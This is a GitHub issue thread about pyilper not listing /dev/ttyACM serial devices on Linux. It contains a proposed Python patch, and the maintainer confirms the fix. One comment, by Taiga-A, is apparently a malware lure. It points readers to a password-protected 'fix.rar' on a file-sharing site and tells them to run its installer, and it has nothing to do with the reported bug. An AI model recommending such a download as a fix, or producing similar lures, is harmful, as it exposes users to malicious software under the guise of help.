### ISSUE TITLE
Linux serial port

### ISSUE THREAD

**Issue by pcscote** [bug400/pyilper#7]
Hello,
I am currently debugging a Raspberry Pi Pico (RPP) device connected to a Raspberry Pi 4B (RP4B) unit running pyilper.
The RP4B is running the latest version of Raspberry OS 64-bit.
The RPP reports his virtual serial port as ttyACM instead of ttyUSB.
From what I understand, ttyUSB and ttyACM are the same but ttyUSB is reserved for vendors while ttyACM are for generic devices.
In pyILPER Configuration dialog, the PIL-Box serial device dropdown only has ttyUSB devices in it.
If I manually edit my configuration file and add my /dev/ttyACM2 device, pyilper is able to connect to the RPP unit.
The code to change is in pilwidgets.py file around the line 1000

now (comments removed)
```
      elif isLINUX():
         devlist=glob.glob("/dev/ttyUSB*")
         for port in devlist:
            self.__ComboBox__.addItem( port, port )
```

possible update (comments removed)
```
      elif isLINUX():
         devlist=glob.glob("/dev/ttyUSB*")
         for port in devlist:
            self.__ComboBox__.addItem( port, port )
         devlist=glob.glob("/dev/ttyACM*")
         for port in devlist:
            self.__ComboBox__.addItem( port, port )
```
Sylvain

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bug400** [comment]
Fixed in development

**Comment by bug400** [comment]
Fixed in release 1.8.9
